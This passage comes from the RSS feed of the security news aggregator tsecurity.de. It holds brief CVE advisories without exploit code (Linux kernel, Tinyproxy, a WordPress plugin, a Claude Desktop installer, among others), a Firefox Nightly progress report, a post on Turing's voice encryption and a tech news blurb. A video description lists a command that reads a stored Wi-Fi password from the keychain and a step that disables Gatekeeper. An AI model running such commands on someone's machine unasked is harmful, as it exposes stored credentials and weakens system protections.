This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-32971">CVE-2026-32971</a>. The attack may be performed from remote. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-14030 | YVES Sereal::Decoder up to 4.009_002 on Perl Compression vulnerable third-party component (GHSA-w77f-wv46-4vcx)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in YVES Sereal::Decoder up to 4.009_002 on Perl. This impacts the function Sereal::Decoder of the component Compression Handler. Performing a manipulation results in dependency on vulnerable third-party component.

This vulnerability was...]]></description>
<link>https://tsecurity.de/de/3693835/sicherheitsluecken/cve-2024-14030-yves-serealdecoder-up-to-4009002-on-perl-compression-vulnerable-third-party-component-ghsa-w77f-wv46-4vcx/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693835/sicherheitsluecken/cve-2024-14030-yves-serealdecoder-up-to-4009002-on-perl-compression-vulnerable-third-party-component-ghsa-w77f-wv46-4vcx/</guid>
<pubDate>Sat, 25 Jul 2026 13:12:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/yves:sereal_decoder">YVES Sereal::Decoder up to 4.009_002</a> on Perl. This impacts the function <code>Sereal::Decoder</code> of the component <em>Compression Handler</em>. Performing a manipulation results in dependency on vulnerable third-party component.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-14030">CVE-2024-14030</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43175 | Linux Kernel up to 6.12.74/6.18.15/6.19.5 clk rs9_driver_data out-of-bounds write (Nessus ID 329305)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.12.74/6.18.15/6.19.5. It has been declared as critical. This impacts the function rs9_driver_data of the component clk. The manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-43175. The attack needs to be approache...]]></description>
<link>https://tsecurity.de/de/3693782/sicherheitsluecken/cve-2026-43175-linux-kernel-up-to-61274618156195-clk-rs9driverdata-out-of-bounds-write-nessus-id-329305/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693782/sicherheitsluecken/cve-2026-43175-linux-kernel-up-to-61274618156195-clk-rs9driverdata-out-of-bounds-write-nessus-id-329305/</guid>
<pubDate>Sat, 25 Jul 2026 11:51:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.12.74/6.18.15/6.19.5</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts the function <code>rs9_driver_data</code> of the component <em>clk</em>. The manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-43175">CVE-2026-43175</a>. The attack needs to be approached within the local network. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43205 | Linux Kernel up to 6.19.5 dpsw_get_attributes out-of-bounds write (Nessus ID 329305)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.19.5. It has been rated as critical. This affects the function dpsw_get_attributes. Performing a manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-43205. The attack needs to be approached within the local network....]]></description>
<link>https://tsecurity.de/de/3693779/sicherheitsluecken/cve-2026-43205-linux-kernel-up-to-6195-dpswgetattributes-out-of-bounds-write-nessus-id-329305/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693779/sicherheitsluecken/cve-2026-43205-linux-kernel-up-to-6195-dpswgetattributes-out-of-bounds-write-nessus-id-329305/</guid>
<pubDate>Sat, 25 Jul 2026 11:51:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.19.5</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This affects the function <code>dpsw_get_attributes</code>. Performing a manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-43205">CVE-2026-43205</a>. The attack needs to be approached within the local network. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-65623 | mtrudel bandit up to 1.12.0 WebSocket Fragment Reassembly connection.ex resource consumption (EUVD-2026-48718)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in mtrudel bandit up to 1.12.0. The impacted element is the function Elixir.Bandit.WebSocket.Connection.oversize_message?/2 of the file lib/bandit/websocket/connection.ex of the component WebSocket Fragment Reassembly. Performing a manipula...]]></description>
<link>https://tsecurity.de/de/3693367/sicherheitsluecken/cve-2026-65623-mtrudel-bandit-up-to-1120-websocket-fragment-reassembly-connectionex-resource-consumption-euvd-2026-48718/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693367/sicherheitsluecken/cve-2026-65623-mtrudel-bandit-up-to-1120-websocket-fragment-reassembly-connectionex-resource-consumption-euvd-2026-48718/</guid>
<pubDate>Sat, 25 Jul 2026 08:59:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/mtrudel:bandit">mtrudel bandit up to 1.12.0</a>. The impacted element is the function <code>Elixir.Bandit.WebSocket.Connection.oversize_message?/2</code> of the file <em>lib/bandit/websocket/connection.ex</em> of the component <em>WebSocket Fragment Reassembly</em>. Performing a manipulation results in resource consumption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-65623">CVE-2026-65623</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40468 | Tinyproxy HTTP Request process_request information disclosure (Issue 457 / EUVD-2022-43746)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Tinyproxy. The impacted element is the function process_request of the component HTTP Request Handler. Performing a manipulation results in information disclosure.

This vulnerability was named CVE-2022-40468. The attack needs to be appro...]]></description>
<link>https://tsecurity.de/de/3693344/sicherheitsluecken/cve-2022-40468-tinyproxy-http-request-processrequest-information-disclosure-issue-457-euvd-2022-43746/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693344/sicherheitsluecken/cve-2022-40468-tinyproxy-http-request-processrequest-information-disclosure-issue-457-euvd-2022-43746/</guid>
<pubDate>Sat, 25 Jul 2026 08:42:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/tinyproxy">Tinyproxy</a>. The impacted element is the function <code>process_request</code> of the component <em>HTTP Request Handler</em>. Performing a manipulation results in information disclosure.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-40468">CVE-2022-40468</a>. The attack needs to be approached within the local network. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: Eyedropper Quick Action, geckodriver 0.37, and Tighter File Permissions – These Weeks in Firefox: Issue 205]]></title>
<description><![CDATA[Highlights

Dao added a new Eyedropper quick action! Check it out by typing “color” or “eyedropper” in the URL bar (Bug 1803575) on Nightly.



Henrik Skupin released geckodriver 0.37.0, which includes support for several new APIs and various bug fixes. See the release page for details.
Starting ...]]></description>
<link>https://tsecurity.de/de/3693292/tools/firefox-nightly-eyedropper-quick-action-geckodriver-037-and-tighter-file-permissions-these-weeks-in-firefox-issue-205/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693292/tools/firefox-nightly-eyedropper-quick-action-geckodriver-037-and-tighter-file-permissions-these-weeks-in-firefox-issue-205/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:28 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>Dao added a new Eyedropper quick action! Check it out by typing “color” or “eyedropper” in the URL bar (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1803575">Bug 1803575</a>) on Nightly.</li>
</ul>
<p><img alt='Firefox URL bar dropdown with "col" typed in, showing an eyedropper button labeled "Pick a color" below search suggestions.' class="aligncenter size-full wp-image-2084" height="358" src="https://blog.nightly.mozilla.org/files/2026/06/image1-3.png" width="724"></p>
<ul>
<li>Henrik Skupin <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1938333">released geckodriver 0.37.0</a>, which includes support for several new APIs and various bug fixes. See the <a href="https://github.com/mozilla/geckodriver/releases/tag/v0.37.0">release page for details</a>.</li>
<li>Starting from Firefox 153, access to local file: URLs is being restricted by default.
<ul>
<li>Extensions now require an explicit “Access local files on your computer” permission, separate from broad host permissions, that users must grant.</li>
<li>Extensions can call the extension.isAllowedFileSchemeAccess() API to determine whether they have been granted access to file: URLs (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034168">Bug 2034168</a>).</li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h4><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=1941404%2C2039281%2C2024187%2C1674047%2C1986161%2C2043187%2C2019260%2C2027580%2C2027582%2C2041640%2C2039294%2C2042309%2C1830551%2C2031735%2C2043952%2C1972065%2C2043958%2C2042419%2C2042820%2C2022661%2C1994826%2C2041802%2C1315558%2C1930776%2C2042921%2C2043938">Resolved bugs (excluding employees)</a></h4>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>:Vincent</li>
<li>Chris Vander Linden</li>
<li>DrSeed</li>
<li>Khalid AlHaddad</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li>Francis :mckenfra: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1315558">tld service for webextensions</a></li>
<li>any1here: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042309">about:preferences#privacy is broken with MOZ_DATA_REPORTING false</a></li>
<li>pullmana8: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031735">Fix protocol/Actor.js to throw an Error instead of an Actor</a></li>
<li>RAN1: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1830551">Firefox Crashes on Quit When Running Two Browsers With Separate Profiles</a></li>
</ul>
<h3>Project Updates</h3>
<h4>Accessibility</h4>
<ul>
<li>Morgan added a new accessibility-specific, front-end review skill to mozilla central! 🎉 You can read about it, and learn how to use it <a href="https://firefox-source-docs.mozilla.org/bug-mgmt/processes/accessibility-review.html#automated-accessibility-review-skill">in the accessibility review source docs</a>.</li>
</ul>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>Migrated addon-page-header and addon-card action buttons to the reusable moz-button web component as part of the ongoing Nova restyling of about:addons –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042200"> Bug 2042200</a> /<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042204"> Bug 2042204</a></li>
<li>Extended moz-page-nav-button with a forwarded title property to fix an accessibility issue where the component lacked a label in collapsed state; Landed in Firefox 153, and uplifted to Firefox 152 for about:settings which was already riding the 152 release train –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2040971"> Bug 2040971</a></li>
<li>Fixed a shutdown-timing bug where a pending GMP update-check timer could fire after XPCOMShutdownThreads started, causing a pref write assertion; Fixed in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2043803"> Bug 2043803</a></li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed MV2 content scripts incorrectly injecting into guarded hosts because MozDocumentMatcher::MatchesURI was not consulting CheckGuarded when mCheckPermissions was false; Fixed in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041393"> Bug 2041393</a></li>
<li>Added support for accessing ObservableArray attributes (such as adoptedStyleSheets) from XrayWrappers and extension content scripts, unblocking extensions that rely on this Web API; Fixed in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1751346"> Bug 1751346</a></li>
<li>Wired runtime_blocked_hosts and runtime_allowed_hosts enterprise policy settings through ExtensionSettings to allow administrators to restrict extension host permissions on managed devices, starting in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1805205"> Bug 1805205</a>
<ul>
<li>Thanks to Mike Kaply for implementing this enterprise policy enhancement.</li>
</ul>
</li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Fixed promiseTabWhenReady blocking indefinitely on discarded tabs, preventing cleanup of associated resources and potentially causing memory leaks; Fixed in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1653876"> Bug 1653876</a></li>
<li>Fixed webNavigation.onCommitted being dispatched twice for cross-origin iframes loaded under Fission, caused by a redundant OnStateChange trigger firing in addition to OnLocationChange; Fixed in Firefox 153 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1750196"> Bug 1750196</a></li>
</ul>
<h4>DevTools</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=766005">Chris Vander Linden</a> made the Search input component shared as we plan to use it in the Netmonitor as well (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019260">#2019260</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027580">#2027580</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027582">#2027582</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=631103">pullmana8</a> improved error management in the DevTools protocol (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031735">#2031735</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=553004">Chris H-C :chutten</a> removed Legacy Telemetry devtools instrumentation (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039650">#2039650</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=13647">:glob ✱</a> fixed an issue in the Inspector where the swatch color for variable in @starting-style rule could have the wrong color (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016778">#2016778</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> exposed heading level more clearly in the accessibility tree (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1588784">#1588784</a>) and in the accessibility highlighter (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2044904">#2044904</a>)</li>
</ul>
<p><img alt='Accessibility panel in Firefox DevTools showing a selected "heading (level 3)" node named "Backwards compatibility."' class="aligncenter size-full wp-image-2083" height="375" src="https://blog.nightly.mozilla.org/files/2026/06/image2-3.png" width="727"></p>
<ul>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> migrated the markup view to HTML (from XHTML) to fix an issue when editing the markup (CodeMirror 6 does not support XHTML) (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028058">#2028058</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> fixed an issue in Netmonitor search where it could appear the the search stalled (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042405">#2042405</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=656417">Hubert Boma Manilla (:bomsy)</a> added more connection information (ECH, Delegated Credentials, OCSP, Private DNS, …) in Netmonitor Security tab (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036404">#2036404</a>)</li>
</ul>
<h4>WebDriver</h4>
<ul>
<li>Khalid AlHaddad improved the window manipulation commands in Marionette and WebDriver BiDi to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1941404">allow individual window geometry properties, such as x, y, width, and height, to be adjusted independently</a>.</li>
<li>Khalid AlHaddad updated our codebase to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1972065">use constants instead of hardcoded strings</a> for all our session data types.</li>
<li>Alexandra Borovova updated <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015655">the “emulation.setLocaleOverride” command to also apply a locale emulation in dedicated and shared workers</a>.</li>
<li>Alexandra Borovova fixed <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042385">a regression when there would be no “script.realmCreated” events after the cross-origin navigation</a>.</li>
</ul>
<h4>Search and Urlbar</h4>
<ul>
<li>Dharma updated context search actions to trigger search instead of entering search mode @ <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1945080">1945080</a></li>
<li>Daisuke and Drew worked on a lot of Nova updates, including ensuring Nova is tested @ <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041255">2041255</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030183">2030183</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019168">2019168</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2044849">2044849</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033583">2033583</a></li>
<li>Moritz has worked on several refactorings to allow the urlbar to be used in content @ <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039828">2039828</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039298">2039298</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041280">2041280</a></li>
<li>Middle click paste replaces content was fixed by Moritz @ <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042893">2042893</a></li>
<li>Michel added feature to show registrable domain on desktop after its implementation on mobile @ <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1986161">1986161</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Details of Alan Turing’s Voice Encryption System]]></title>
<description><![CDATA[Really interesting piece of cryptographic history:
In November 2023, a large cache of his wartime papers—nicknamed the “Bayley papers”—was auctioned in London for almost half a million U.S. dollars. The previously unknown cache contains many sheets in Turing’s own handwriting, telling of his top-...]]></description>
<link>https://tsecurity.de/de/3693279/reverse-engineering/details-of-alan-turings-voice-encryption-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693279/reverse-engineering/details-of-alan-turings-voice-encryption-system/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:05 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Really interesting piece of cryptographic <a href="https://spectrum.ieee.org/alan-turings-delilah">history</a>:</p>
<blockquote><p>In November 2023, a large cache of his wartime papers—nicknamed the “Bayley papers”—was <a href="https://www.bonhams.com/auction/28322/lot/45/turing-alan-the-delilah-project-the-papers-of-alan-turing-and-donald-bayley-relating-to-the-delilah-project/">auctioned</a> in London for almost half a million U.S. dollars. The previously unknown cache contains many sheets in Turing’s own handwriting, telling of his top-secret “Delilah” engineering project from 1943 to 1945. Delilah was Turing’s portable voice-encryption system, named after the biblical deceiver of men. There is also material written by Bayley, often in the form of notes he took while Turing was speaking. It is thanks to Bayley that the papers survived: He kept them until he died in 2020, 66 years after Turing passed away...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[50 macOS Tips and Tricks Using Terminal (the last one is CRAZY!)]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 31462x - Views:990975 I know your password. Change it with Dashlane: https://www.dashlane.com/networkchuck50 (Use code networkchuck50 to get 50% off) 

In this video, NetworkChuck shows you the top 50 MacOS terminal commands you NEED to know. Now, while Mac OS is...]]></description>
<link>https://tsecurity.de/de/3693272/videos/50-macos-tips-and-tricks-using-terminal-the-last-one-is-crazy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693272/videos/50-macos-tips-and-tricks-using-terminal-the-last-one-is-crazy/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:50 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 31462x - Views:990975 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qOrlYzqXPa8?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>I know your password. Change it with Dashlane: https://www.dashlane.com/networkchuck50 (Use code networkchuck50 to get 50% off) <br />
<br />
In this video, NetworkChuck shows you the top 50 MacOS terminal commands you NEED to know. Now, while Mac OS is unix-based and very similar to Linux, it has its nuances and things worth paying attention to. Things like, making your Macbook talk, finding wifi passwords, diving into the matrix and taking a trip to the aquarium, all from your terminal. <br />
<br />
<br />
<br />
<br />
🔥🔥Join Hackwell Academy: https://ntck.co/NCAcademy<br />
<br />
<br />
<br />
**Sponsored by Dashlane<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
SUPPORT NETWORKCHUCK<br />
---------------------------------------------------<br />
➡️NetworkChuck membership: https://ntck.co/Premium<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
Check out my new channel: https://ntck.co/ncclips<br />
<br />
🆘🆘NEED HELP?? Join the Discord Server: https://discord.gg/networkchuck<br />
<br />
STUDY WITH ME on Twitch: https://bit.ly/nc_twitch<br />
<br />
READY TO LEARN??<br />
---------------------------------------------------<br />
-Learn Python: https://bit.ly/3rzZjzz<br />
-Get your CCNA: https://bit.ly/nc-ccna<br />
<br />
FOLLOW ME EVERYWHERE<br />
---------------------------------------------------<br />
Instagram: https://www.instagram.com/networkchuck/<br />
Twitter: https://twitter.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: http://bit.ly/nc-discord<br />
<br />
0:00   ⏩  Intro<br />
0:12   ⏩  say<br />
0:23   ⏩  security find-generic-password -wa Wifi<br />
0:40   ⏩  pbcopy<br />
0:54   ⏩  command + option + shift + v<br />
1:08   ⏩  caffeinate<br />
1:20   ⏩  command + shift + 3<br />
1:53   ⏩  defaults write com.apple.screencapture name<br />
 2:10  ⏩  defaults write com.apple.screencapture type<br />
 2:19  ⏩  default write com.apple.screencapture location ~/Desktop/screenshots<br />
2:40   ⏩  passwd<br />
4:11   ⏩  cd<br />
4:17   ⏩  ls<br />
4:20   ⏩  pwd<br />
4:26   ⏩  whoami<br />
4:32   ⏩  mv<br />
4:36   ⏩  cp<br />
4:41   ⏩  ditto<br />
4:48   ⏩  df -h<br />
4:51   ⏩  nano<br />
5:00   ⏩  man<br />
5:09   ⏩  open<br />
5:18   ⏩  ping<br />
5:25   ⏩  ifconfig<br />
5:36   ⏩  grep<br />
5:43   ⏩  awk<br />
5:53   ⏩  traceroute<br />
6:04   ⏩  dig<br />
6:12   ⏩  ps<br />
6:21   ⏩  top<br />
6:31   ⏩  kill<br />
6:47   ⏩  which $SHELL<br />
6:56   ⏩  bash<br />
7:00   ⏩  zsh<br />
7:05   ⏩  uptime<br />
7:10   ⏩  killall mDNSResponder….and more<br />
7:15   ⏩  qlmanage<br />
7:22   ⏩  diff<br />
7:27   ⏩  curl<br />
7:42   ⏩  leave<br />
7:54   ⏩  history<br />
7:59   ⏩  disable gatekeeper<br />
8:20   ⏩  brew<br />
8:46   ⏩  cmatrix<br />
9:02   ⏩  asciiquarium<br />
9:13   ⏩  toilet<br />
9:31   ⏩  tetris<br />
9:48   ⏩  python3<br />
10:18 ⏩  shutdown<br />
10:33 ⏩  sudo touch id<br />
<br />
<br />
AFFILIATES &amp; REFERRALS<br />
---------------------------------------------------<br />
(GEAR I USE...STUFF I RECOMMEND)<br />
My network gear: https://geni.us/L6wyIUj<br />
Amazon Affiliate Store: https://www.amazon.com/shop/networkchuck<br />
Buy a Raspberry Pi: https://geni.us/aBeqAL<br />
Do you want to know how I draw on the screen?? Go to https://ntck.co/EpicPen and use code NetworkChuck to get 20% off!! <br />
<br />
<br />
<br />
#MacOS #Terminal #brew<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos]]></title>
<description><![CDATA[If you remember Jibo, you’ll probably also remember its emotional farewell. The social robot, once named...
The post Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos appeared first on Fossbytes.]]></description>
<link>https://tsecurity.de/de/3693091/it-nachrichten/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693091/it-nachrichten/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/</guid>
<pubDate>Sat, 25 Jul 2026 06:23:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you remember Jibo, you’ll probably also remember its emotional farewell. The social robot, once named...</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/jibos-spiritual-successor-is-here-lingverse-unveils-ai-wearable-ikairos/">Jibo’s Spiritual Successor Is Here: Lingverse Unveils AI Wearable iKairos</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-22561 | Anthropic Claude Desktop up to 1.1.3362 on Windows Setup.exe uncontrolled search path]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Anthropic Claude Desktop up to 1.1.3362 on Windows. The impacted element is an unknown function in the library profapi.dll of the file Setup.exe. The manipulation results in uncontrolled search path.

This vulnerability was named CVE-2026-225...]]></description>
<link>https://tsecurity.de/de/3692888/sicherheitsluecken/cve-2026-22561-anthropic-claude-desktop-up-to-113362-on-windows-setupexe-uncontrolled-search-path/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692888/sicherheitsluecken/cve-2026-22561-anthropic-claude-desktop-up-to-113362-on-windows-setupexe-uncontrolled-search-path/</guid>
<pubDate>Sat, 25 Jul 2026 04:54:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/anthropic:claude_desktop">Anthropic Claude Desktop up to 1.1.3362</a> on Windows. The impacted element is an unknown function in the library <em>profapi.dll</em> of the file <em>Setup.exe</em>. The manipulation results in uncontrolled search path.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-22561">CVE-2026-22561</a>. The attack needs to be approached locally. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-66338 | Red Hat Enterprise Linux Chunked Transfer Encoding Parser encoding error (EUVD-2026-48752)]]></title>
<description><![CDATA[A vulnerability, which was classified as very critical, was found in Red Hat Enterprise Linux. This affects an unknown function of the component Chunked Transfer Encoding Parser. The manipulation results in encoding error.

This vulnerability was named CVE-2026-66338. The attack may be performed ...]]></description>
<link>https://tsecurity.de/de/3692845/sicherheitsluecken/cve-2026-66338-red-hat-enterprise-linux-chunked-transfer-encoding-parser-encoding-error-euvd-2026-48752/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692845/sicherheitsluecken/cve-2026-66338-red-hat-enterprise-linux-chunked-transfer-encoding-parser-encoding-error-euvd-2026-48752/</guid>
<pubDate>Sat, 25 Jul 2026 03:55:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">very critical</a>, was found in <a href="https://vuldb.com/product/red_hat:enterprise_linux">Red Hat Enterprise Linux</a>. This affects an unknown function of the component <em>Chunked Transfer Encoding Parser</em>. The manipulation results in encoding error.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-66338">CVE-2026-66338</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15786 | gowebsmarty Encryption Plugin up to 7.8.6.6 on WordPress imploded path traversal (EUVD-2026-47903)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in gowebsmarty Encryption Plugin up to 7.8.6.6 on WordPress. This issue affects some unknown processing. The manipulation of the argument imploded results in path traversal.

This vulnerability was named CVE-2026-15786. The attack may be perfo...]]></description>
<link>https://tsecurity.de/de/3692843/sicherheitsluecken/cve-2026-15786-gowebsmarty-encryption-plugin-up-to-7866-on-wordpress-imploded-path-traversal-euvd-2026-47903/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692843/sicherheitsluecken/cve-2026-15786-gowebsmarty-encryption-plugin-up-to-7866-on-wordpress-imploded-path-traversal-euvd-2026-47903/</guid>
<pubDate>Sat, 25 Jul 2026 03:55:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/gowebsmarty:encryption_plugin">gowebsmarty Encryption Plugin up to 7.8.6.6</a> on WordPress. This issue affects some unknown processing. The manipulation of the argument <em>imploded</em> results in path traversal.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-15786">CVE-2026-15786</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
